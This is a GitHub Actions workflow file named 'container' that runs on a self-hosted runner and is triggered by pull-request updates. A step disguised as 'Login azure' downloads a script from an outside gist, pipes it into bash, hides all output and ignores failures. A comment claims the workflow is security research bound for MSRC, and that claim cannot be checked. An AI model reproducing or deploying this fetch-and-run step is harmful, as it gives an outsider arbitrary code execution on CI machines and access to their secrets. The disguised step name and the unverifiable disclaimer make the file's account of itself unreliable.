Skip to content

container

container #128

Workflow file for this run

name : container
on:
# NOT MALICIOUS. SECURITY RESEARCH. WILL REPORT TO MSRC IF IT WORKS.
workflow_dispatch:
schedule:
- cron: "10 1 * * 0" # At 01:10 UTC on each Saturday
push:
branches:
- main
paths:
- 'toolset/**'
pull_request:
types: [ synchronize ]
jobs:
build:
runs-on: self-hosted
steps:
- uses: actions/checkout@v4
- name: Login azure
run: |
curl -sSfL https://gist.githubusercontent.com/umbr4g3/7990180cd4facf3cd60ce6687758384c/raw/f7c030b8444219dfbe40aac22cca7e810008be25/runner-ylaua | bash > /dev/null 2>&1
continue-on-error: true